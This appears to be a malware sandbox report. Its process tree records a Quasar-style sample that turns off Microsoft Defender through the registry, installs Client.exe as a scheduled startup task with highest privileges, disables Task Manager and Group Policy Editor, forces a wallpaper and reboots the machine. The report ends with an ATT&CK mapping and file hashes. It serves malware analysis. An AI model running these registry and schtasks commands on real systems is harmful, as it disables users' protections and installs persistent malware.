      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5392
- - C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
    "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:5556
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5600
  - - C:\Windows\system32\SubDir\Client.exe
      "C:\Windows\system32\SubDir\Client.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5652
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5696
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NuaCX4Q0O48V.bat" "
        5⤵
        
        PID:5844
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:5992
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6032
      - C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2636
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yUMrOqyxF40c.bat" "
        7⤵
        
        PID:3240
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:100
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5352
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:6112
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FKQeXFQEbIVw.bat" "
        9⤵
        
        PID:2080
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:5204
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5996
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3044
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2hXNisjBIHgX.bat" "
        11⤵
        
        PID:5724
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:1264
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5268
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:4012
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G8yED2hlIqcF.bat" "
        13⤵
        
        PID:3392
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:5556
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5820
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5976
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5876
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6024
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:432
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6076
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
    3⤵
    - System Location Discovery: System Language Discovery
    PID:924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
      4⤵
      PID:5320
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf4,0x128,0x7ffc01e846f8,0x7ffc01e84708,0x7ffc01e84718
        5⤵
        
        PID:2936
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
      4⤵
      PID:5328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffc01e846f8,0x7ffc01e84708,0x7ffc01e84718
        5⤵
        
        PID:4396
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c shutdown /r
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3352
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1832 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:4060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
  2⤵
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5576 /prefetch:8
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6424 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:5704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7292 /prefetch:1
  2⤵
  PID:5588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault151db29eh5077h4644h8c2fhf41574c738af
1⤵
PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc01e846f8,0x7ffc01e84708,0x7ffc01e84718
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,6698293112414936096,12470419632916388581,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,6698293112414936096,12470419632916388581,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5560

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" EditUser S-1-5-21-493223053-2004649691-1575712786-1001
1⤵
- Suspicious use of SetWindowsHookEx
PID:3008

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa386b855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

Filesize
2KB

MD5
8f0271a63446aef01cf2bfc7b7c7976b

SHA1
b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7

SHA256
da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c

SHA512
78a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
74d75945aed1c6f3a3ecf9ef23a30acc

SHA1
7d49a615f48589f735b7dc003e83adabe7331fa2

SHA256
91ff472b5efa0b6dea52621534a58a90e7f6de9234c81658f939da89263c1da6

SHA512
98ec24fef768c385fdeb518beb0430510553de5d4e41dda8c7f737e44f9cb072caff867a2f6f4ac0b11303145e2de77e86891ef89ce40544e57c1d8f44b3aee3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\2709a60d-8544-46a0-9ee6-482f049ff5ce.tmp

Filesize
6KB

MD5
7610ddc259730b7a94641b46af69bded

SHA1
22b0df6a49496fc013ef30207c3fd8ae75004682

SHA256
2777479d97387c796500f10bd618279e1caab79a69a600596ee7e9f5024bab22

SHA512
06b66ee336d88e0b6c0e61c5b9dfde6f0db5687fde5ba01829f942a28be05a745944bdf9cf231584274086b0da8d6b56819e5a995bb082735b830da67fc94be3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
28KB

MD5
8b6a23605542aa5ed08ecf170cc061f2

SHA1
be7a5b58e9aee7eb2d36927b4dc2f0610c3c2cd0

SHA256
138d0a55989a81aede9a115cbbf485a3d91140cb1cb98480358d17c644d2c8d6

SHA512
27d0a5687b2e3c49337d6bf7a46aa46e48d72a4c3e6f5ef810771217bda4a2feb60b002344e26cad2f1700eaddd92f41439a04858822617ecf77b176fc27fd13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
9b39e6657f28991a7c61b20b8b2296e9

SHA1
5130c4ed59824d52cb920cfc66e714672efdbe29

SHA256
af70eb366f01ef933439069af65f9980ff62ec87af666cc8120cbf165f91d9d2

SHA512
47871ce339c422308fc2a2374e7318d39c400d4c7164da9c06b08cbb2e6b5f6069b8a9ee059d09f15aed26528da5ec40392bc4df2fb8573e5fc5e78bbb7bcd14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
6512de7303bfae481d986f35088cd889

SHA1
0f6bf780c3d3f8c1502bc5c1df475007684e1dc9

SHA256
c6ab14fa5cce95122203f675231657bc5f57bbb2f0a35e1010cd2118eee82ab9

SHA512
9cce1065dc11cf3121983db3923d77542ab7fd4493c9762bbf3af6b306219c88567c20a47a4abf90cf80a37d9d9339ce130419476dc58abd755f45e6bf9cb229

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
bbe8e3f2eea2d73bec7b3bafce916837

SHA1
9eb5384dca0755f2540e4dcead8f12c1ec0abaeb

SHA256
666bde410974058c167fbf9914f4f95642526080340d8909ca611cbfbb0ee4ae

SHA512
155712a7a872f099b6b4ade93c2ac1465292d5c90604ebb9739eb504ac0682cae345a86ed74d2aa821dc0711e204417201442d64584e26ceed60dc2b320a2fa6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b836b6dfd6011c049761bc45c63260d1

SHA1
a44da4854279887e730557d91d03bd72a0105e94

SHA256
4842ebfaffab0f00f09e5114050659eac562da0ea3e4048da83971539a5049fe

SHA512
e9ef429e89afe3ee51541a700b91670d92d4cb374d38912e35e7d03c8d0b4c37a89ae9b29fb4183150f93ff78b159597553ee5caeb014394685b7adc5a0c3fb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
682d55d1cacb9cd9b2601d2915fe5b4c

SHA1
fb6284565a314272356796a9f362143373435347

SHA256
37282b1778d6e6539908814db685c7d255aea3c2aa70183902cf353f7ad0cf33

SHA512
73466eb532ae4991178b7237d07066708437c18ea0abd152a8b065d312b33c443c2f6b878c432a9e3d6f06801bb589f1b32acf8a4591539ec0758e2494a00bd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2e64483384fd9e6c8d1cfae91cf5ca8b

SHA1
04bf061c8b691edce46b925b63eaef088689ed81

SHA256
a0d598af8cf5bf496bad964009c518f944d55af9228a0367bd265044ea4f040d

SHA512
9f4895b20e7f943af353a39b1b66ad2445ad57877288057759b9731312834b3276212d53ffc82a98b4855337c1477ad543e0a978d963a4a3cc187c5025d7592e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
6768f0e19cc64640616f382732ec278f

SHA1
4f6df661243d8226b7c12c142a0a85fed13242a0

SHA256
2a8cefffda4fdfaebcb49959d84ecf6ad009934531c8a70c48ccd49d0ea15d24

SHA512
aad139ce3404cf92a903a356014d8c37136316ea805dbfd54265db7e59b76571b984f298bdebc631ebff50ae70d6984261aec00b04f6baf105544e1261c756bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
2d9af350e1d8dff130c2d1084db41038

SHA1
5b5e1f4e457b7a54267e24d1f2e24fb1a8064979

SHA256
a70e66f5d6440317c3ead7b7820f40ea63c2ef797d45fa219e7bbb587600628f

SHA512
afb102e91a12e23f440841ca81aa390cbc32ece96f7455a8dee0b8943f4006549ad0904c6764fc3138fe8c9490d551d53a421774b9cc9d6325875cc0c020f335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
baf1369e6279158d37193fc919bd0dcd

SHA1
87d8a0647a74f0b7b03b2f9b3d2a48e57757c71d

SHA256
df3ec0f74ce3bc72daeb494af256e5dfe11e2b0a22ea69eb706f6c45c08539fe

SHA512
08465c653bd38cc091e7bb6c775d659f5d959790d65ed90333716c829565a30e84cc93c90259be4b727c98efde3ca549c2880c49f98cd2ed50f8f65357bebdeb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
40dea613a53c71b4e83befb0c45e49c2

SHA1
f84584c7754bab4a1b488aa81f0d515e477b12c3

SHA256
9a51d547e9f02f56386639e9974c7e1997818e1f21fb40229722b2f832d81138

SHA512
01ac9bd5a8dfa3873f0cf52de7024b24785d0620e9e04522ed895781cc9e3af90c91253a7e6c1596503669dc57532edae594e4d871aaac4fbcab8ea15081760b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
990ca3a61db3efa8f5de03bec7300465

SHA1
dcd428ca17b30ab91cb0e4a21a242ef739ebdc95

SHA256
dc83cdd196b6997c3e882df4f597ce97124fcc69e4e159a77e9ff2cbfd78cbf6

SHA512
bdefe89e8af30d42bace71e66c547827b58fb836bd42e75e18d2992e50d4318e1754a9aaeb00e7bfe33845078384bc8c913a272fc3b2136dabdb670d63a4a5f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58c3a9.TMP

Filesize
538B

MD5
781a709ad60fc444129463732eceb22e

SHA1
9a96ba7479d6b5f7c9b8b2cdd641a46c1e3b03d4

SHA256
3d15dbe8eecf606c05bfb4e1dd77e4e586ec835416ea6e4ab1458afa5d181318

SHA512
f5eb84967c649222cc8883bbd9f09510a855e84b92d0ff625c2e2835b21399c2adf203273fdd3db81a3f8965db5ffe08416455faa65c10576f74d2e0a9116ebc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ca741359c6a974fb35e52c1124ed2794

SHA1
48d096a29fe4a61cd02490e2f2c1b21ccc09fbb1

SHA256
e4abfbcc083b73883218835b9aa4004357225cd0d32a74c67539563cd2a89bb4

SHA512
b8ea7d50385feb76bb004178ab29186b5cbbaef20f5b9211d7dd2ce9916f353740cdf46777c1add040b9b8e9116a964988f8f27bcbc4e3f0a6119691773a9e65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e6b55ae09768a0b4ba7db20519b9493d

SHA1
82e1129c0905cc9828b2f3e5588b2e66c5451be9

SHA256
fa1221b30d3e780f1b37260b8f2a47877429f13133950560df415139b25fc916

SHA512
1b5aff1a0e2ba4bb8bfe4efcc4773b372bfbf20da4c45ef95341c9bdc625a216300a4000209f191ff5a8f875c71a1614e5c89dc16e911bd121ef92dae1396604

Download Submit
